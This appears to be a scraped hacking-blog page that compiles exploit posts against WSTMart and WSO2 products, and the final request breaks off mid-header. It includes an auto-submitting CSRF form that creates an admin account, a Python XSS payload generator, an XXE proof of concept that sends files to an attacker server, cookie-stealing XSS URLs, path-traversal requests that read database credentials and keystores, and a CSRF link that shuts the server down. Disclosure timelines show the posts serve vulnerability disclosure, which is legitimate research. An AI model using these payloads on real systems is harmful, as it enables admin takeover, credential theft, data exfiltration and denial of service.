# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage:https://github.com/wstmall/wstmart/
# Software Link:http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE :CVE-2018-19138
# 0x02 CSRF PoC
# 18/5000
# Function point: background management - staff management - login account
# poc:
# 1234.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<form action="http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/index.php/admin/staffs/add.html" id="test" name='test' method="POST">
<input type="hidden" name='staffId' value="" />
<input type="hidden" name='loginName' value="" />
<input type="hidden" name='staffPhoto' value="" />
<input type="hidden" name='loginPwd' value="" />
<input type="hidden" name='staffName' value="" />
<input type="hidden" name='staffNo' value="" />
<input type="hidden" name='RoleId' value="" />
<input type="hidden" name='staffPhone' value="" />
<input type="hidden" name='wxOpenId' value="" />
<input type="hidden" name='workStatus' value="" />
<input type="hidden" name='staffStatus' value="" />
</form>
<script type="text/javascript">
test.staffId.value="0";
test.loginName.value="admin3";
test.staffPhoto.value="";
test.loginPwd.value="admin3";
test.staffName.value="admin3";
test.staffNo.value="";
test.RoleId.value="0";
test.staffPhone.value="";
test.wxOpenId.value="";
test.workStatus.value="1";
test.staffStatus.value="1";
test.submit();
</script>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863123612
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)
# Date: 21 Apr 2022
# Exploit Author: cxosmo
# Vendor Homepage: https://wso2.com
# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)
# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;
# API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;
# API Microgateway 2.2.0;
# Data Analytics Server 3.2.0;
# Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;
# IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;
# Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;
# Identity Server Analytics 5.5.0 and 5.6.0;
# WSO2 Micro Integrator 1.0.0.
# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)
# CVE: CVE-2022-29548
import argparse
import logging
import urllib.parse
# Global variables
VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="
DEFAULT_PAYLOAD = "alert(document.domain)"
# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()
def generate_payload(url, custom_payload=False):
log.info(f"Generating payload for {url}...")
if custom_payload:
log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")
else:
log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")
def clean_url_input(url):
if url.count("/") > 2:
return f"{url.split('/')[0]}//{url.split('/')[2]}"
else:
return url
def check_payload(payload):
encoded_characters = ['"', '<', '>']
if any(character in payload for character in encoded_characters):
log.info(f"Unsupported character(s) (\", <, >) found in payload.")
return False
else:
return urllib.parse.quote(payload)
if __name__ == "__main__":
# Parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument("-t", "--target",
help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",
required="True", action="store")
parser.add_argument("-p", "--payload",
help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",
action="store", default=False)
args = parser.parse_args()
# Clean user target input
args.target = clean_url_input(args.target.lower())
# Check for unsupported characters in custom payload; URL-encode as required
if args.payload:
args.payload = check_payload(args.payload)
if args.payload:
generate_payload(args.target, args.payload)
else:
generate_payload(args.target)
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt
[+] ISR: ApparitionSec
Vendor:
=============
www.wso2.com
Product:
============================
Wso2 Identity Server v5.1.0
As the industry’s first enterprise identity bus (EIB), WSO2 Identity Server
is the central backbone
that connects and manages multiple identities across applications, APIs,
the cloud, mobile, and Internet
of Things devices, regardless of the standards on which they are based. The
multi-tenant WSO2 Identity Server
can be deployed directly on servers or in the cloud, and has the ability to
propagate identities across geographical
and enterprise borders in a connected business environment.
Vulnerability Type:
============================
XML External Entity / CSRF
CVE Reference(s):
===================
CVE-2016-4312 (XXE)
CVE-2016-4311 (CSRF)
Vulnerability Details:
=====================
WSO2IS XML parser is vulnerable to XXE attack in the XACML flow, this can
be exploited when XML input containing a reference to an
external entity is processed by a weakly configured XML parser. The attack
leads to the disclosure and exfiltration of confidential
data and arbitrary system files, denial of service, server side request
forgery, port scanning from the perspective of the machine
where the parser is located (localhost), and other system impacts.
The exploit can be carried out locally by an internal malicious user or
remote via CSRF if an authenticated user clicks an attacker
supplied link or visits a evil webpage. In case of WSO2IS system files can
be read / exfiltrated to the remote attackers server
for safe keeping -_-
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096
Exploit code(s):
===============
XXE POC, exfiltrate the victims Windows hosts file to our remote server.
1) Form for the XXE POST request.
<form id='XXE' action="
https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false"
method="post">
<textarea rows="20" cols="100" name="txtRequest">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "C:\Windows\System32\drivers\etc\hosts">
<!ENTITY % dtd SYSTEM "http://attackserver:8080/payload.dtd">
%dtd;]>
<Request xmlns="urn:oasis:names:tc:xacml:3.0:core:schema:wd-17"
CombinedDecision="false" ReturnPolicyIdList="false">
<Attributes>
<Attribute>&send;</Attribute>
</Attributes>
</Request>
</textarea>
<input type="hidden" name="forwardTo" value="eval-policy.jsp">
<script>document.getElementById('XXE').submit()</script>
</form>
2) DTD file on attacker server.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attackserver:8080?%file;'>">
%all;
3) On attack server create listener for the victims HTTP request.
python -m SimpleHTTPServer 8080
Disclosure Timeline:
============================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt
[+] ISR: ApparitionSec
Vendor:
=============
www.wso2.com
Product:
==================
Ws02Carbon v4.4.5
WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.
Vulnerability Type:
===========================
Persistent / Reflected
Cross Site Scripting (XSS) - Cookie Disclosure
CVE Reference:
==============
CVE-2016-4316
Vulnerability Details:
=====================
WSo2 Carbon has multiple XSS vectors allowing attackers to inject client-side scripts into web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy,
stealing session cookies and used as a platform for further attacks on the system.
Exploit code(s)
===============
Persistent XSS:
GET Request
https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS&setName="/><script>alert(document.cookie)</script>
Request two is POST
/carbon/identity-mgt/challenges-mgt-finish.jsp
setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question0=&question1=City+where+you+were+born+%3F&setId1=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question1=City+where+you+were+born+%3F&question2=Father%27s+middle+name+%3F&setId2=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question2=Father%27s+middle+name+%3F&question3=Name+of+your+first+pet+%3F&setId3=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question3=Name+of+your+first+pet+%3F&question4=Favorite+sport+%3F&setId4=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question4=Favorite+sport+%3F&question5=Favorite+food+%3F&setId5=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question5=Favorite+food+%3F&question6=Favorite+vacation+location+%3F&setId6=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question6=Favorite+vacation+location+%3F&question7=Model+of+your+first+car+%3F&setId7=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question7=Model+of+your+first+car+%3F&question8=Name+of+the+hospital+where+you+were+born+%3F&setId8=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question8=Name+of+the+hospital+where+you+were+born+%3F&setId9=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question9=XSS
Then XSS payload will be listed here in below URL:
https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1&item=identity_security_questions_menu
Finally when victim clicks to "Delete" entry on the page the XSS is executed.
Here is stored payload from the HTML source
<a onclick="removeSet('\x22/><script>alert(666)</script>')" style='background-image:url(images/delete.gif);' type="button" class="icon-link">Delete</a></td>
///////////////////////////////////////////////////////////////////////////////////////////////////////////
Reflected XSS
XSS #1
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war&webappState=all&hostName=victim-server&httpPort=9763&defaultHostName=victim-server&webappType=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E
XSS #2
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29&edit=HELL
XSS #3
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29&edit=true
XSS #4
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war&webappState=all&hostName=victim-server&httpPort=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E&defaultHostName=victim-server&webappType=
XSS #5
https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true&flow=in&phase=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
XSS #6
https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?&dsName=WSO2_CARBON_DB&driver=com.mysql.jdbc.Driver&url=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E&username=root&dsType=RDBMS&customDsType=RDBMS&dsProviderType=default&dsclassname=undefined&dsclassname=undefined&dsproviderProperties=undefined&editMode=false&changePassword=true&newPassword=
Disclosure Timeline:
===========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.wso2.com
Product:
====================
Ws02Carbon v4.4.5
WSO2 Carbon is the core platform on which WSO2 middleware products are
built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common
middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific
features needed to solve a specific enterprise scenario.
Vulnerability Type:
=========================
Local File Inclusion (LFI)
CVE Reference:
==============
CVE-2016-4314
Vulnerability Details:
=====================
An authenticated user can download configuration files in the filesystem
via downloadArchivedLogFiles operation in LogViewer admin service.
The request to the admin service accepts a file path relative to the carbon
log file directory (i.e. <WSO2_PRODUCT_HOME>/repository/logs)
hence can access any file in the file system.
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098
Example: accessing the registry.xml file via Local File Inclusion exposes
the MySQL passwords.
<currentDBConfig>mysql-db</currentDBConfig>
<dbConfig name="mysql-db">
<url>jdbc:mysql://localhost:3306/regdb</url>
<userName>regadmin</userName>
<password>regadmin</password>
<driverName>com.mysql.jdbc.Driver</driverName>
<maxActive>80</maxActive>
<maxWait>6000</maxWait>
<minIdle>5</minIdle>
</dbConfig>
Exploit code(s):
===============
LFI to read Database creds, truststore key file, web.xml etc...
1) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml&tenantDomain=&serviceName=
2) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml
3) Access Truststore Key file.
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
4) Read web.xml
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml
Disclosure Timeline:
===========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt
[+] ISR: ApparitionSec
Vendor:
============
www.wso2.com
Product:
==================
Ws02Carbon v4.4.5
WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.
Vulnerability Type:
=================================
Cross Site Request Forgery / DOS
CVE Reference:
==============
CVE-2016-4315
Vulnerability Details:
=====================
The attack involves tricking a privileged user to initiate a request by clicking a malicious link or visiting an evil webpage to
shutdown WSO2 Servers.
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101
The getSafeText() Function and conditional logic below processes the "action" parameter with no check for inbound CSRF attacks.
String cookie = (String) session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, session);
try {
if ("restart".equals(action)) {
client.restart();
} else if ("restartGracefully".equals(action)) {
client.restartGracefully();
} else if ("shutdown".equals(action)) {
client.shutdown();
} else if ("shutdownGracefully".equals(action)) {
client.shutdownGracefully();
}
} catch (Exception e) {
response.sendError(500, e.getMessage());
return;
}
Exploit code(s):
===============
Shutdown the Carbon server
<a href="https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown">Shut it down!</a>
Disclosure Timeline:
==========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
=======================================================================
title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
vulnerable version: WSO2 Identity Server 5.3.0
fixed version: WSO2 Identity Server 5.5.0
CVE number: CVE-2018-8716
impact: high
homepage: https://wso2.com/products/dashboard
found: 2017-12-13
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WSO2 Carbon redefines middleware by providing an integrated and componentized
middleware platform that adapts to the specific needs of any enterprise
IT project - on premise or in the cloud.
100% open source and standards-based, WSO2 Carbon enables developers to rapidly
orchestrate business processes, compose applications and develop services using
WSO2 Developer Studio and a broad range of business and technical services that
integrate with legacy, packaged and SaaS applications.
The lean, complete, OSGi-based platform includes more than 175 components – OSGi
bundles or Carbon features. The WSO2 Carbon core framework functions as
“Eclipse for servers” and includes common capabilities shared by all WSO2
products, such as built-in registry, user management, transports, security,
logging, clustering, caching and throttling services, co-ordination, and a
GUI framework."
Source: https://wso2.com/products/carbon/
"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to
rapidly create visually appealing and engaging web components such as
dashboards, and gadgets, and unlocking data for business intelligence and
monitoring. With the host of capabilities that Dashboard Server provides
out-of-the-box, going from data to screen has never been easier."
Source: https://wso2.com/products/dashboard-server/
Business recommendation:
------------------------
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
-----------------------------------
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by the end-users to manage their accounts, change passwords,
alter their profiles, or change certain settings. An attacker is able to inject
arbitrary JavaScript payloads into various textboxes (username, home address,
lastname, firstname, etc).
The payloads are permanently stored in the dashboard and triggered every time the
dashboard is visited. The payload is also potentially triggered in the carbon
part of WSO2, which means that an attacker would be able to inject payloads
from the front-end application into a middleware application, which is not
accessible from the internet and attack administrators.
2) Stored Cross-Site Scripting in WSO2 Carbon
The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker
host URL an arbitrary JavaScript payload can be injected and permanently stored
in the web application.
Proof of concept:
-----------------
1) Stored Cross-Site Scripting in WS02 Dashboard
The following input fields are vulnerable and JavaScript payloads can be directly
injected:
- Firstname
- Lastname
- Username
- Address
It is suspected, that all user inputs are returned unfiltered in all server responses.
2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set
the URL to the following payload: "><img src=x onerror=aler(document.cookie)>
Everytime the carbon middleware application is accessed, the payload is triggered.
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the most recent version
at the time of discovery:
* WSO2IS 5.3.0
Vendor contact timeline:
------------------------
2018-01-25: Contacting vendor through security@wso2.com
2018-02-08: Asking for status update. Vendor responds, that they are
still investigating the issue.
2018-02-21: Vendor responds with release date and further details
concerning the nature of the vulnerabilities. The XSS in the
Carbon component was a duplicate and should be already fixed.
Concerning the XSS in the dashboard a fix is implemented
and will be rolled out with the release of WSO2 Identity
Server 5.5.0.
2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
2018-03-15: Mitre assigned CVE-2018-8716.
2018-03-26: Vendor informed us, that the final release of the updated
software will be on 5th of April.
2018-04-23: Public Release
Solution:
---------
Update WSO2 Identity Server to 5.5.0
Workaround:
-----------
No workaround available
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
# Date: 2020-04-13
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Softwrare link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700
Technical Details & Description:
================================
A remote Stored Cross Site Scripting has been discovered in WSO2 API
Manager Ressource Browser component).
The security vulnerability allows a remote attacker With access to the
component "Ressource Browser"
to inject a malicious code in Add Comment Feature.
The vulnerability is triggered after sending a POST request to
`/carbon/info/comment-ajaxprocessor.jsp` with Parameter
"comment=targeted&path=%2F".
Remote attackers has the ablility to spread a malware,to Hijack a session
(a session with Higher privileges), or to initiate phishing attacks.
The security risk of the Stored XSS web vulnerability is estimated as
medium with a cvss (common vulnerability scoring system) count of 5.4
Exploitation of the Stored XSS web vulnerability requires a low privilege
web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in Compromising the
server .
Request Method:
[+] POST
Module:
[+] /carbon/info/comment-ajaxprocessor.jsp
Parameters:
[+] comment=admincomment
[+] path=%2F
=======================================
POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none;
wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e;
JSESSIONID=4B3AB3AA8895F2897685FA98C327D521;
requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none;
region4_monitor_menu=none; region5_tools_menu=none;
current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close
comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F
==============================
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144
//the body of response includes attacker malicious script
<a class="closeButton icon-link registryWriteOperation"
onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete"
style="background-image:
url(../admin/images/delete.gif);position:relative;float:right"> </a>
<iframe href=http://phishing_url>
<br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker
Proof of Concept (PoC):
=======================
//Let's suppose we're Attacking an admin with higher privileges
1-Attacker opens his account
2-add arbitrary comment
3-intercepts the request
4-add malicious script to the comment
5-admin access his account,he wants to add a comment,the malicious script
got executed
===>Admin account compromised
===============================================================================
Example malicious script :
<script>
alert(document.cookie);
</script>
===============================================================================
# Title: WSO2 3.1.0 - Arbitrary File Delete
# Date: 2020-04-12
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Softwrare link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
Document Title:
===============
WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal )
##CVE not assigned yet
##Security Update : https://apim.docs.wso2.com/en/latest/
Common Vulnerability Scoring System:
====================================
8.5
Affected Product(s):
====================
WSO2 API Manager Carbon Interface
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product .
The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests
and to delete arbitrary System files.
The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter
of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files
via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" .
The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5.
Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality.
===============================
Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...)
[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d
eployment\server\registryextensions\commons-dir
at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j
ava:531) ~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(
OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO
peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out
InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.client.OperationClient.execute(OperationClient.java:
149) ~[axis2_1.6.1.wso2v38.jar:?]
at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem
oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte
nsions.stub_4.7.13.jar:?]
at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.
deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens
ions.ui_4.7.13.jar:?]
at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS
ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t
omcat_9.0.22.wso2v1.jar:?]
*Error displayed in Web browser with body request:
<script type="text/javascript">
CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
</script>
=============================
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp
Vulnerable Parameter(s):
[+] extensionName
Server version
3.0.0
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
1-Attacker must have access to the Extension component(List ,Add ,Delete extensions )
2-attacker uploads any file .jar extension
3-attacker intercepts the request that follows and modifies the parameter with traversal string:
--- PoC Session Logs [POST] ---
POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
